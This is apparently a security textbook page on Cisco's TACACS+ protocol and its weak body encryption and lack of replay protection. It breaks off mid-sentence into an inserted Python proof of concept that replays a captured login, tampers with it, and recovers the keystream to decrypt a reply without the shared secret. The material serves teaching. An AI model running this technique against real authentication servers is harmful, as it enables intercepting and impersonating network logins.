
Communication Security: Remote Access and Messaging • Chapter 3  121

                 TACACS+

                 Cisco developed a proprietary successor to TACACS known as TACACS+.
                    The driving factor behind TACACS+ was to give networking professionals the
                 ability to manage all remote access components from a centralized location.
                 TACACS+ is also credited with separating the three AAA functions (authentication,
                 authorization, and accounting). TACACS+ is considered proprietary because its
                 packet formats are completely different from those in TACACS or XTACACS, making
                 TACACS+ incompatible with previous versions. Unlike previous versions of TACACS,
                 which used one database for all AAA functions, TACACS+ can use a separate
                 database for each. TACACS+ was also the first revision to offer protected
                 communications between the TACACS+ client and the TACACS+ server: the packet
                 body is obfuscated with a keystream derived from a shared secret, although the
                 12-byte packet header is still sent in cleartext. Unlike TACACS and XTACACS,
                 which use UDP, TACACS+ uses TCP (port 49) as its transport. TACACS+ continues
                 to gain popularity because it is easy to implement and reasonably priced.



                 EXAM WARNING

                      Make sure you understand the difference between TACACS and
                      TACACS+. The most important thing to remember is that TACACS uses
                      UDP as its transport protocol while TACACS+ uses TCP. Also, TACACS+ is
                      a proprietary version owned by Cisco.






                 Vulnerabilities
                 The largest vulnerability in TACACS+ is the comparative weakness of its encryp-
                 tion mechanism. The packet body is simply XORed with an MD5-derived keystream,
                 and nothing in the packet authenticates its contents. Someone with access to the
                 network path can therefore capture an authentication request from a client and
                 manipulate it without knowing the shared secret. The server will accept the altered
                 request and send an encrypted reply; because the cleartext of that reply is
                 predictable (for example, a fixed failure message), XORing the two recovers the
                 keystream, and any other packet protected with the same keystream can then be
                 read. Even worse, the encryption used in TACACS+ is keyed only by a shared secret
                 that is rarely changed, so a secret compromised at any point exposes all later
                 traffic protected with it. It is, therefore, a very good idea to regularly change
                 the shared secrets used by TACACS+ clients.
                    One of the biggest complaints regarding TACACS+ is that it does not offer
                 protection against replay attacks. A replay attack occurs when an attacker captures
                 a packet and later resends it unchanged; the server has no timestamp, nonce, or
                 other freshness check that would let it reject the duplicate, so the attacker can
                 impersonate the client without ever decrypting the packet. When files are sent
                 over a network using Transmission Control Protocol/Internet Protocol (TCP/IP),
                 they are split into segments suitable
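The attack described above, and the missing replay protection discussed in the next paragraph, can both be shown against a small model of the protocol. The block below is an added example and is not code from the book or from any TACACS+ implementation: it reproduces the body obfuscation as documented in RFC 8907 (chained MD5 of session_id, key, version and seq_no, XORed over the body), together with the cleartext header and the authentication START/REPLY layouts. The shared secret, the session ID, the user credentials, the two server banners and the `TacacsServer` class are constructed stand-ins for the example; a real daemon's failure text would differ, but the attack only needs it to be predictable.

```python
import hashlib
import struct

# TACACS+ constants from RFC 8907; only the ones this example needs.
TAC_PLUS_VERSION = 0xC0            # major version 0xC, minor 0
TAC_PLUS_AUTHEN = 0x01             # packet type: authentication
AUTHEN_STATUS_PASS = 0x01
AUTHEN_STATUS_FAIL = 0x02
HEADER = struct.Struct("!BBBBII")  # version, type, seq_no, flags, session_id, length


def pseudo_pad(session_id, key, version, seq_no, length):
    """Keystream used to obfuscate the TACACS+ body (RFC 8907, section 4.5):
    MD5_1 = MD5(session_id || key || version || seq_no)
    MD5_n = MD5(session_id || key || version || seq_no || MD5_{n-1})
    Nothing in the input depends on the body, so equal (session_id, key,
    version, seq_no) always yields the identical pad."""
    prefix = struct.pack("!I", session_id) + key + bytes([version, seq_no])
    pad, block = b"", b""
    while len(pad) < length:
        block = hashlib.md5(prefix + block).digest()
        pad += block
    return pad[:length]


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def build_packet(key, session_id, seq_no, body):
    """Cleartext 12-byte header followed by body XOR pad (XOR is its own inverse)."""
    header = HEADER.pack(TAC_PLUS_VERSION, TAC_PLUS_AUTHEN, seq_no, 0, session_id, len(body))
    pad = pseudo_pad(session_id, key, TAC_PLUS_VERSION, seq_no, len(body))
    return header + xor_bytes(body, pad)


def parse_packet(key, packet):
    version, _type, seq_no, _flags, session_id, length = HEADER.unpack(packet[:12])
    pad = pseudo_pad(session_id, key, version, seq_no, length)
    return session_id, seq_no, xor_bytes(packet[12:12 + length], pad)


def authen_start_body(user, password, port=b"tty0", rem_addr=b"10.0.0.5"):
    """Authentication START, action=LOGIN, authen_type=PAP: the password rides in 'data'."""
    lens = (len(user), len(port), len(rem_addr), len(password))
    return struct.pack("!8B", 1, 1, 2, 1, *lens) + user + port + rem_addr + password


def authen_reply_body(status, server_msg):
    """Authentication REPLY: status, flags, server_msg_len, data_len, server_msg."""
    return struct.pack("!BBHH", status, 0, len(server_msg), 0) + server_msg


class TacacsServer:
    """Constructed stand-in for a TACACS+ daemon. Like the real protocol it has no
    nonce, timestamp or memory of session_ids already seen, so a captured START is
    accepted again verbatim. The two banners are made up for the example."""
    FAIL_MSG = b"Authentication failed"   # fixed text, assumed known to the attacker
    PASS_MSG = b"Welcome, admin"          # what the attacker wants to read

    def __init__(self, key, users):
        self.key, self.users = key, users

    def handle(self, packet):
        session_id, seq_no, body = parse_packet(self.key, packet)
        user_len, port_len, rem_len, data_len = body[4:8]
        user = body[8:8 + user_len]
        password = body[8 + user_len + port_len + rem_len:][:data_len]
        ok = self.users.get(user) == password
        reply = authen_reply_body(AUTHEN_STATUS_PASS if ok else AUTHEN_STATUS_FAIL,
                                  self.PASS_MSG if ok else self.FAIL_MSG)
        return build_packet(self.key, session_id, seq_no + 1, reply)


def attack(key=b"tac_plus_secret", session_id=0x11223344):
    """Capture, replay, tamper, then recover the keystream from a predictable reply.
    Only the client and server use `key`; the attacker steps never touch it."""
    server = TacacsServer(key, {b"admin": b"hunter2"})
    # 1. A legitimate login. The attacker records both packets but cannot read them.
    captured_start = build_packet(key, session_id, 1, authen_start_body(b"admin", b"hunter2"))
    captured_reply = server.handle(captured_start)
    # 2. Replay: the identical bytes are accepted and produce the identical reply.
    replay_reply = server.handle(captured_start)
    # 3. No integrity check: flipping one bit of the last body byte (the last password
    #    character) yields a wrong password, so the server answers with its predictable FAIL body.
    tampered = bytearray(captured_start)
    tampered[-1] ^= 0x01
    fail_reply = server.handle(bytes(tampered))
    # 4. Known plaintext XOR ciphertext = pad for (session_id, seq_no=2). The genuine
    #    reply used the same session_id, seq_no, version and key, hence the same pad.
    known_fail_body = authen_reply_body(AUTHEN_STATUS_FAIL, TacacsServer.FAIL_MSG)
    pad = xor_bytes(fail_reply[12:], known_fail_body)
    recovered = xor_bytes(captured_reply[12:], pad)
    status, _flags, msg_len, _data_len = struct.unpack("!BBHH", recovered[:6])
    return {
        "replay_accepted": replay_reply == captured_reply,
        "recovered_status": status,
        "recovered_msg": recovered[6:6 + msg_len],
    }


if __name__ == "__main__":
    print(attack())
```

Running `attack()` shows the replayed START accepted with a byte-identical reply, and the original PASS reply (including its banner) decrypted without the shared secret. The keystream recovered this way is only as long as the predictable reply, and it is bound to the session_id and seq_no, so rotating the shared secret limits how long a recovered pad or leaked key stays useful.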



                                                                              www.syngress.com